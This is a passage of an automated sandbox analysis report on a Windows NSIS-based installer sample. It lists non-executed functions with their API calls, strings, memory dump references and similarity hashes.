                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                  • Opcode ID: 983617adc3fb59bada791ca239273a70529ab93e183a396e050099d658997f71
                                                                                                                                                                                                                                                                  • Instruction ID: 859c8e5cf93c3f84440f38a6d8c6a0cb0ce917112422b96fb642ee91708591da
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 983617adc3fb59bada791ca239273a70529ab93e183a396e050099d658997f71
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1BC01231504700D7E5206FB99D4EB043A54A74037DB544B7AF4F5F11F1C77C4645852D

                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                  Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                  • String ID: $ @$M$N
                                                                                                                                                                                                                                                                  • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                  • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                  • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                  Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                  • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                  • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                  • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                  • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                  • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                  • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                  • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                  • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                  • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                  • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                  • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                  • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                                                  Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                  • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                    • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                    • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                    • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                    • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425576,755723A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                  • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                  • String ID: F$A
                                                                                                                                                                                                                                                                  • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                  • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                  • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                  Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                  • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                  • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                  • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                  • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                  • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                  Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425576,755723A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00425576,755723A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                  • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                  • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                  • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                  • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                  Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateInstance
                                                                                                                                                                                                                                                                  • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                  • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                  • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                  • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                                                  Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                  • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                                                                                                                  Function 0040737E Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
